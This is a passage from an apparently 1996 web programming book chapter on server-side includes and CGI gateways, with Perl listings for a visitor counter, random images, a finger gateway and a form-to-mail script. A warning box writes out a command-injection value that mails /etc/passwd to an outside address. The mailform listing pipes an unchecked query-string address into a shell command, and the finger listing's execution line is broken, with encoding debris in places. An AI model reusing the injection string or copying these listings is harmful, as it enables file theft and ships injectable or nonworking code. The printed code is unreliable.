This chapter covers the use of server-side includes (commonly known as SSI) and World Wide Web gateways, which are special purpose programs that perform some actions and output results in HTML. We discuss how to improve prewritten gateways and how to develop custom gateways for your own use.
Both techniques enable Web developers to go beyond normal static HTML pages. SSI is a simple mechanism of dynamically creating Web pages in which the information changes every time the page is requested.
A gateway is a program that gathers and converts information from different sources so that it can be used by a person or another program. A Web gateway is a program that converts information so that a Web browser can display it. These special programs can be written in virtually any computer language and can handle tasks as simple as converting finger information or as complex as talking to a mail server or handling database queries. One could imagine many ways for servers and gateways to communicate, but the Common Gateway Interface (CGI) arose as the standard mechanism for information exchange between Web servers and other programs.
In fact, both techniques allow the Web to be a complete platform for presenting information of different natures. It may be static images, video, or text, but also information originating from other Internet tools or services. Everything is integrated in a more dynamic and interactive way! By using SSI and gateways, the Web becomes the major platform for accessing the Internet. The Web expansion figures prove it already! The following list shows the number of estimated WWW hosts on the Internet (figures provided by Network Wizards, http://www.nw.com/):
Server-side includes (SSI) define a special set of tags (also called directives) that can be embedded in the HTML source of documents and are preprocessed by the Web server before they are sent to the client, the Web browser. Think of SSI as special bits of programs (or, more correctly, the names of programs) embedded in HTML pages. Instead of sending just the source of the page, the Web server searches for these special tags, executes the code it finds, replacing the tag with the output of the program, and then finally sends the page to the Web browser. The SSI tags are never sent to the browser and are always replaced by data (in some cases, data may be empty).
The format of an SSI tag or directive is
<!--#command argument="value"-->
where
Each tag corresponds an action executed directly by the server or by a program the server must call.
Notice that the SSI tag starts with <!-- and ends with -->, as do comments embedded in HTML pages. This design decision allows for servers and clients to ignore the tag if SSI functionality is not used. If the Web server allows SSI functionality, it parses the document and replaces any SSI tag by the output of the corresponding program, leaving other comments as they are.
See the list of possible SSI tags later in this chapter, in the section "A List of Useful SSI Directives."
The difference between SSI and, for example, Java or JavaScript is that the program code is executed on the server side instead of the client side. There has been a lot of discussion on whether strategy is better, but both have their own qualities and pitfalls. The main advantages of this SSI approach follow:
As you may have guessed, there are some disadvantages, too:
The bottom line is that you should use SSI when and where you really need it. Lots of times, SSI is the most suited solution for a given problem, but sometimes there may be a better way to do things.
Well, this all seems fine, but what are server-side includes useful for? Server-side functionality in general and server-side includes in particular allow applications as simple as a visitor counter or as complex as a database query to be displayed inside an HTML page.
Although SSI allows the embedding of the output of lots of different programs or actions in a page, the most commonly used programs produce the following results:
SSI applications are, in fact, special purpose programs that run on the server side in order to produce a Web page (or part of it, really) before it is sent to a browser. CGI is an interface specification designed to allow Web servers and other programs to interact. It defines what the program should expect as information from the server and what and how it should send data to the Web server.
SSI does not require (but can make use of) any external interface and is generally easier to implement than CGI or other proprietary solutions (by the use of a proprietary Application Programming Interface (API), for example). For example, SSI programs do not receive input through the stdin (standard input), as do CGI scripts (when the POST method is used). Just think of SSI applications as programs that do not need to worry about the context in which they are running and that just need to output the correct results.
The common characteristic between SSI and CGIs is that both are techniques for server-side execution, and most of the time the computer language used to produce CGI and SSI programs is the same. Remember Perl? Being a Perl addict, most of the SSI programs I develop myself are done with this language. But, sometimes, when speed of execution or server overload becomes an issue, we should consider alternatives, preferably compiled languages (not interpreted) such as C.
Also, when viewing a document source, you don't generally notice SSI, but you notice CGI script calls. When the browser receives the page, every SSI tag has been replaced by the corresponding action output; however, CGI script calls stay as they are because the script is still going to be executed, generally by pressing a form submit button.
Most modern Web servers support SSI, but I will cover only two of them: Apache and CERN.
The reason for this choice is that both servers are freely available to everyone and are used in many Web server platforms around the world.
Tip |
You can find lots of statistics about Web servers' usage at http://www.netcraft.com/survey/ |
In fact, it was the ncSA HTTPD that first introduced the SSI feature. This section covers the use of SSI on the Apache and CERN server, but most of the principles apply to other servers, as well (at least ncSA and Sioux, two near cousins of Apache). Apache is, according to the latest figures, the most used Web server in the world and was created as an evolution of ncSA. The CERN server was created in the birthplace of the Web, the CERN (European Center for Nuclear Physics Research) laboratory in Geneva, Switzerland.
The CERN server, one of the oldest around, now called W3 server, does not support SSI. But there is a way around this, as with everything in computer science, called fakessi. fakessi is a special script in Perl (we could imagine it in C or another language) that works alongside the CERN server and provides the SSI functionality. Although limited in features and more performance demanding, this is a nice script that could help many people still using this server.
Not only do you have to have a Web server that supports SSI, you must also configure it accordingly. It is up to the Webmaster to decide whether or not to support SSI, even if the server used supports the feature. In particular, the Webmaster must decide which documents are parsed and which ones are not. Parsing is the action of searching through a file (HTML in this case) for the SSI directives. Sure, you can configure your server to parse every page sent, but this is not generally a good idea because it overloads a server considerably. A common configuration is to name the files that will be parsed with the .shtml extension and tell the server to parse only these. Normal .html files will not be parsed this way. The Apache server introduced a new trick that consists of turning on the x bit for the file you want to parse (make the file an executable by turning on the x bit with the chmod 700 command on UNIX platforms). This way, you can let all your normal files have the .html extension and turn on the x bit for those you want to parse for SSI directives. I personally prefer the second solution because there is no need to worry about different file extensions (and, consequently, new MIME types), but either solution is better than letting the server parse all your .html files!
The CERN server does not originally support the use of SSI. A way around this is to use a program sitting alongside the server that parses the pages itself but asks the server to send them to the client. So, you must also tell the server to pass the files to this program before sending them to the client.
There are several scripts available on the Internet to allow the use of SSI with the CERN server, but one of the most used is called fakessi.pl, a Perl script that you can find at http://sw.cse.bris.ac.uk/WebTools/fakessi.html>.
Here are the steps for installing fakessi.pl:
The preceding configuration is the preferred one, but you can configure the CERN server to parse all your .html files with the directive Exec /*.html /cgi-bin/fakessi.pl. Be careful about using /* instead of /*.html because with this, all the files would be parsed-even graphics files! The fakessi.pl is reported not to work well with this kind of parsing.
From the beginning, Apache was designed to provide SSI functionality. Configuring this server in order to actually use it is quite simple:
You have just configured the Apache server to parse .shtml files and files with the x bit on. You could use only one of these alternatives if you prefer to, by either forgetting the XBitHack or the AddType .shtml directive. In order to test the SSI feature, you should create an .shtml file or an .html with the execution attribute (x bit) turned on (chmod 700 the file on UNIX systems).
As you have seen previously, the format of an SSI directive is
<!--#command argument="value"-->
Following is the list of the six possible commands available in SSI, along with the arguments and values they allow:
Figure 7.1: The HTML source of the document displaying a navigation bar.
Figure 7.2: A page with a navigation bar.
Having seen the various possibilities for SSI directives, let's take a look at two examples: a visitor counter and a random image generator.
For both examples, we will present the program listing, the SSI tags, and the resulting page.
Because both programs are expected to output HTML text, they must inform the server using the Content-Type: text/html MIME header followed by two newline characters (represented by \n, usually) before the actual result. Don't forget to output the correct MIME header each time you develop a script that will be used by an exec SSI directive; otherwise, your Web server could output an error message instead of the desired result.
A visitor counter is probably the most used SSI feature; at least, it is one of the most desired. See for yourself on the comp.infosystems.www.authoring.* groups. The aim of this SSI tag and corresponding script is to display the actual page with a counter embedded (in the top or in the bottom, usually), updated each time someone requests the page.
The SSI part is only the tag
<!--#exec cgi="/cgi-bin/counter.cgi"-->
which you should insert in your HTML document in the place you want the counter to appear. You can complete it with the surrounding string
Welcome, you are the user number
<!--#exec cgi="/cgi-bin/counter.cgi"-->
to visit these pages!
Then, there is the counter program itself, which is called counter.cgi. It is executed each time the page is requested. For this example, I have chosen to develop a simple script (see Listing 7.1) in Perl. The $count_file variable (see the beginning of Listing 7.1) should have the complete path to the file that keeps the counts, for example, /usr/local/etc/httpd/logs/count_file.
Listing 7.1. The counter script in Perl.
#!/usr/bin/perl
#
# counter.cgi - A simple visitor counter
#
# [email protected], March 96
# Place the file in a directory which the web server can access
$count_file="/somewhere/count_file";
open(CFILE, $count_file);
@counts=<CFILE>;
close(CFILE);
$doc=$ENV{'DOCUMENT_URI'}; # HTTP_REFERER works for CERN server
# If it was called from the command line consider it an experience
if ($doc eq "") { $doc = "experience" };
# Aliases for the Homepage
if ($doc eq "/index.html") { $doc = "/" }
# Read the count file, pick the correct entry and increment it
$found = 0;
for $line (@counts) {
chop ($line);
($page,$count)=split(/ /, $line);
$page=~s/'//g;
if ($page eq $doc)
{
$count++;
$found = 1;
$line = "'$page' $count";
$found_count = $count;
}
push (@newcount, $line);
}
if ($found == 1) {
$count = $found_count
} else {
$count = 1;
push (@newcount, "'$doc' 1");
}
@newcount=sort(@newcount);
# Updates the count file
open (CFILE, ">$count_file");
flock(CFILE, 2); # lock
for $line (@newcount) { print CFILE "$line\n"; }
flock(CFILE, 8); # unlock
close CFILE;
print "Content-Type: text/html\n\n";
print "$count";
### End of counter.cgi ###
Type in the script in Listing 7.1 and save it in your cgi-bin directory. Configure your server in order to provide SSI functionality (or ask your Webmaster to do it for you) and insert the previously shown SSI tag into your page. Then, use your favorite browser and open the page. You should be presented with the result shown in Figure 7.3.
Figure 7.3: The output of a visitor counter script.
Note |
If you don't get the results shown in Figure 7.3., make sure that
|
The corresponding HTML source is in Figure 7.4.
Figure 7.4: The HTML source with the SSI tag for the counter script.
The script randimg.cgi presented here offers the possibility of randomly inserting an image inside an HTML page. It is more a random image tag generator than a random image generator, in fact (it is the tag that is generated by the script, not the image itself). This feature is used in a lot of well known Web pages. Yahoo! and Lycos, for example, use it to display random advertisements on their search pages. Follow these steps to install the randimg.cgi script on your server:
Listing 7.2. A random image tag generator script in Perl.
#!/usr/bin/perl
#
# randimg.cgi - Random image tag generator
#
# [email protected], March 1996
### Number of images
$total = 2;
### Relative paths of each image
@images = ("/Images/hello.gif", "/Images/hi.gif");
### ALT tag for each image
@alt = ("Hello", "Hi, how are you?");
### Link for each image
@link = ("http://www.esoterica.pt/newbie/", "http://www.somewhere.com/");
srand;
$number = int(rand($total));
print "Content-Type: text/html\n\n";
print "<A HREF=\"$link[$number]\"><IMG SRC=\"$images[$number]\" ÂALT=\"$alt[$number]\" BORDER=0></A>"
Imagine that you want to display a random image but also log in the number of times users actually click on a given image. If the URL you have defined for an image points out to a distant site, you have no way to know if your advertisements really call a user's attention. One possible improvement to this script is the addition of URLs pointing to another script on your system-a script that receives URLs, saves or counts them on a file, and then redirects the Web browser to this same URL (using the Location: directive as the output of the script).
The HyperText Transfer Protocol (HTTP) was designed for the transfer of pages between programs called clients and servers. The client is the entity requesting a given document and is what we usually call the browser (in the context of the World Wide Web). The server is responsible for replying to a client's demands, and it is up to the server to find and send a given page. The usual functioning is as follows:
Although being adequate to the task it was designed for (transfer of hypertext pages), the HTTP protocol does not cover-which is absolutely normal-other Internet user's needs, such as reading mail or getting information from other users by using finger. The HTTP protocol is also a stateless protocol making the server forget any information it may have about the client (user), even if the client has asked for a page a few seconds before.
The HTTP protocol limits the possibilities and usefulness of the Web as an integrated Internet access platform because many things we expect to use are not available through the Web. Sure, the Web could live by itself, and it would already be a very interesting and appealing Internet service. But the need to integrate other protocols and functions arose, and gateways are the answer to the problem.
As the name suggests, a gateway is a program that functions as an interface between two systems. In this case, on one side there is the Web and its HTTP protocol, and on the other side there are other Internet protocols or applications. The gateway is the solution, providing the Internet user and its browser a picture of both sides.
Gateways are no more than specially designed programs in any computer language (C, Perl, shell scripts, and so on), respecting the CGI specification or some proprietary API specification. In order to develop a gateway, one needs to know the CGI specification (methods of calling the scripts, variables passed by the server, format of the output, and so on) but also the protocol or program to which the gateway will be talking. This can be as simple as using a finger or archie program, or as complex as talking to a mail or news server. Before starting to develop your own gateways, you should search the Internet for pre-written gateways because virtually anything you might think of has already been handled by someone on the other side of the world. Welcome to the Internet!
In fact, some gateways come standard with the Web server software (in the cgi-bin directory) and are ready to use. The Apache server, for example, comes with a finger, wais, and archie gateway (among others) that you only need to customize to reflect your system settings.
To improve existing gateways, you must first search for them. You can have a look at the tools available in your cgi-bin directory or check out a searching engine or Internet index site if you need a specific gateway.
Improvement of prewritten gateways can be done in several ways:
While the editing to suit your settings is mandatory and the improvement of the presentation is optional but frequently useful, the addition of new functions is the most complex task. You need to fully understand the existing gateway code if you want to add a new feature. Imagine that you have found a mail gateway that allows the reading of mail messages from a Web page, and you think that deleting a message from your mailbox would be a nice feature to integrate in the gateway. So, you need to understand the mail protocol (POP in general), but you also need to read and understand the code of the gateway in order to introduce alterations.
This section covers some examples of gateways that could be used in the World Wide Web. Both examples presented here are custom developed but exist in several different variations on the Internet.
The finger program is useful to find information, by using an e-mail address, about someone on the Internet. In general, we can get a person's name, the last login time, and if he or she has received mail lately. If you don't use a Web gateway, you must either use a shell in a UNIX platform (with the telnet program) in order to issue the finger command or use a finger client on your personal computer. On the other side (the remote server), the finger server waits for requests and sends information about a user.
The use of finger through the Web has a lot more potential. Just think of the display capabilities of a Web browser. It is possible to include some HTML tags on the finger information so that when others use finger to check your e-mail address, they actually see an attractive information page about you.
In a UNIX environment, the finger server reads the user .plan and .project file placed on each user's home directory and displays the contents. So, you can edit your .plan file (by opening a telnet session on the server or by editing it at home and transferring it with an FTP program) and put in something such as
<H1 ALIGN=center>Hello, it is me, look </H1>
<IMG SRC="/~amcf/photo.gif">
which would display the sentence and the photo indicated by the <IMG SRC> tag.
The finger gateway presented in Listing 7.3 allows users to retrieve and display this kind of personal information inside a Web page (along with other data that the finger server sends).
In order to use this script, you must install it in your cgi-bin directory and then call the corresponding URL with /cgi-bin/finger.cgi. There is no need to develop a separate page to let users introduce the e-mail address they want to have information about because the script is intelligent enough to display the main page itself.
Listing 7.3. The finger gateway.
#!/usr/bin/perl
require '/usr/lib/cgi-lib.pl'; # The useful cgi-lib
##### Paths, binaries and system specific information #####
$url = '/cgi-bin/finger.pl'; # finger URL
$finger = '/usr/bin/finger'; # Path for the finger client program
&ReadParse(*input); # cgi-lib, constructs list of key=value form data
print &PrintHeader(); # cgi-lib, prints header "Content-type: text/Âhtml\n\n"
if (&MethGet()) { # GET was used, so...
&InitialForm(); # ... retrieve the initial form
} else { # POST was used so process the query
&Finger();
}
exit(0);
##### Presents initial form #####
sub InitialForm {
print <<EOM;
<HTML>
<HEAD>
<TITLE>Finger</TITLE>
</HEAD>
<BODY>
<H1 ALIGN=center>Finger</H1>
<P>
This page allows you to use a finger client and discover information
about an email address.
</P>
<FORM ACTION="$url" METHOD=post>
<P ALIGN=center>Email address: <INPUT NAME=email VALUE=""></P>
<P ALIGN=center><INPUT TYPE=submit VALUE="Go Get It"></P>
</FORM>
</BODY>
</HTML>
EOM
}
##### Gets user's name from finger information, using login as the key #####
sub Finger {
$email = $input{'email'};
if ($email =~ /[^a-zA-Z0-9_\-\.@]/) {
$_ = "The email address should be on the form <I>user@server</I>!";
} else {
$_ = '$finger $email';
}
print <<EOM;
<HTML>
<HEAD>
<TITLE>Finger: $email</TITLE>
<BODY>
</HEAD>
<BODY>
<H2 ALIGN=center>Finger: $email</H2>
<PRE>
$_
</PRE>
</BODY>
</HTML>
EOM
}
The cgi-lib.pl used by this script (see the require command at the bottom of Listing 7.3) is a useful CGI library for Perl programs and can be found at http://www.bio.cam.ac.uk/web/. It is very often used in CGI scripts. I suggest you download a copy and keep it handy because you will need it often.
Also, notice the verification of user input:
if ($email =~ /[^a-zA-Z0-9_\-\.@]/) {
Warning |
Be very careful when you create a script that passes arguments to other programs or issues shell commands! If the input were not verified for illegal e-mail addresses, a cracker could easily exploit this hole. A cracker could, for example, send the file containing the list of users' passwords on the server to his or her own mailbox, by introducing the e-mail something ; mail [email protected] < /etc/passwd! Or, even worse, the cracker could delete some files belonging to the user that runs the Web server if he or she used the rm (remove file) command instead of the mail command! The golden rule is: Always verify user's input and allow only what is strictly necessary. |
The gateway presented in Listing 7.4 acts as an intermediary between the Web server and a mail program. It is useful for sending form results by e-mail. One of the uses for this, for example, is a comments page in which users visiting your Web pages can leave their comments or questions.
This script should be called from the form page with the POST method:
<FORM ACTION="/cgi-bin/mailform?user@server?subject" METHOD=post>
The e-mail address where the form should be sent to is specified in user@server, and the subject should go just after it. Both arguments are separated by a ? sign. If the form has a field called email, the script will send the form results with the From: and Reply-To: lines containing the correct e-mail address, so you can use the reply function of your mail reader program to answer the user's questions. If there is no field called email on the form, the script will send the mail as if it came from the user who runs the Web server (usually nobody or webmaster). See Figure 7.5 for an example of an HTML form that uses the mailform script.
Figure 7.5: The HTML source of a form page.
Listing 7.4. A form-by-mail script called mailform.
#!/usr/bin/perl
###########################################################################
# mailform.pl 1.0 - A simple form-by-mail script #
# &nb sp; #
# How does it work?   ; #
# It gets data from an HTML form and sends all the field values to the #
# address specified as the first parameter of the script. #
# &nb sp; #
# Special field on form named "email" is used for the Reply-To header. #
# &nb sp; #
# Antonio Ferreira &n bsp; #
# [email protected]   ; #
# &nb sp; #
# March 1996 #
###########################################################################
require '/usr/lib/cgi-lib.pl'; # The useful cgi-lib
######################### Variable initialization ########################
##### Paths, binaries and system specific information #####
$url = 'http://www.esoterica.pt/cgi-bin/mailform.pl'; # mailform URL
$sendmail = '/usr/bin/smail'; # Path and parameters for the mailer
$mailserver = 'mail.esoterica.pt'; # Complete mail server hostname
########################## Start of Main Program ##########################
&ReadParse(*input); # cgi-lib, constructs list of key=value form data
print &PrintHeader(); # cgi-lib, prints header "Content-type: text/html\n\n"
($destaddr, $subject, $garbage) = split(/\?/i, $ENV{'QUERY_STRING'});
if (&MethGet()) {
print <<EOM;
<HTML>
<HEAD>
<TITLE>Message not sent</TITLE>
</HEAD>
<BODY>
The message should be sent with the <B>POST</B> method!
</BODY>
</HTML>
EOM
} else {
if ($destaddr eq '') {
print <<EOM;
<HTML>
<HEAD>
<TITLE>Message not sent</TITLE>
</HEAD>
<BODY>
The message did not have a destination address.
</BODY>
</HTML>
EOM
} else {
&SendForm();
}
}
exit(0);
########################## End of Main Program ##########################
#################### Start of subroutines definitions ###################
##### Uses the mailer defined to send the reply #####
sub SendForm {
$fromurl = $ENV{'HTTP_REFERER'};
$fromhost = $ENV{'REMOTE_HOST'};
if ($subject eq '') {
$subject = $fromurl;
}
if ($input{'email'} eq '') {
$fromaddr = 'www';
} else {
$fromaddr = $input{'email'};
}
open(MAIL,"| $sendmail \"$destaddr\"");
print MAIL <<EOM;
From: $fromaddr
To: $destaddr
Reply-To: $fromaddr
Subject: $subject
X-Mail-Program: Mailform
URL: $fromurl
SERVIDOR: $fromhost
EOM
foreach $field (@input) {
$_ = $field;
($name) = /^(.+)\=.*$/;
print MAIL "-=-=- $name -=-=-\n";
print MAIL "$input{$name}\n";
}
close(MAIL);
print <<EOM;
<HTML>
<HEAD>
<TITLE>Message sent</TITLE>
</HEAD>
<BODY>
<H2 ALIGN=center>Your message was sent to $destaddr!</H2>
</BODY>
</HTML>
EOM
}
The HTML source presented in Figure 7.5 corresponds to the FORM in Figure 7.6. This figure shows what the user sees in his or her browser.
Figure 7.6: The form that will be sent by mail.
When the user presses the button Send It, the form will be sent by mail and will arrive to its destination mailbox. The received mail message will be similar to the one presented in Figure 7.7.
Figure 7.7: The message that arrived in the mailbox..
Lots of other examples could be given here, but we'll let you explore further. There are many gateways out there waiting for you to improve them: finger, wais, archie, uptime, passwd, mail, news, and so on. Explore the programs or protocols first and then modify the corresponding gateways to suit your needs.
When I first became familiar with the Web and then with CGI and gateways, I started thinking to myself: "Wow, the Web is great, and I'll use it to do everything I have ever dreamed of doing on the Internet!" Yes and No. The Web is really great, and it is actually the most suited platform to integrate most of Internet services or functions. But there are some protocols that simply cannot be integrated in Web pages through the use of gateways or similar mechanisms due to their original design, which is incompatible with the Web.
One such example is the telnet protocol. This protocol is highly interactive and does not fit within the client/server connect-and-send-on-demand architecture of the HTTP protocol and the Web. During a telnet connection, the user screen and the telnet server must be connected without interruption so the user can type characters on the keyboard and immediately see results on the screen. How could that be done in a Web page? We could imagine a Web page that would be reloaded each time the user presses a key or each time there are results coming from the telnet server, but that would be practically impossible to accomplish due to performance considerations and design difficulties on the server side. What is possible is the integration of a telnet capable program within a Web browser so that we can telnet from a Web page. But that would be more a telnet screen than a Web page.
Another example is the Ping protocol. This is used to test if a machine is alive and well. The client sends packets of bits, and the server replies as soon as it receives these packets. Generally, Ping programs send and receive packets until we stop them deliberately, which causes a problem because a result HTML page can be produced only when program activity (in this case, Ping activity) finishes with no user intervention. So, one must use a Ping program that sends and receives a fixed number of packets and, as soon as it finishes, sends results back to be displayed in an HTML page.
Fortunately, many other protocols can be integrated through the use of a gateway. For example, there are mail and news gateways that allow reading of mail and news, respectively, as well as database gateways that allow querying from a Web page.
The World Wide Web is evolving as the most powerful, cross-platform, independent, distributed, and hypermedia mechanism for information retrieval. Gateways can only help the Web expand even more in order to become the platform for Internet access. Stay tuned!
This chapter covered server-side includes and World-Wide Web gateways. Both mechanisms help you extend your Web server functionality and consequently improve the richness of the information you want to show to other users. You have learned how to use both SSI and gateways and how to develop custom solutions for your own use.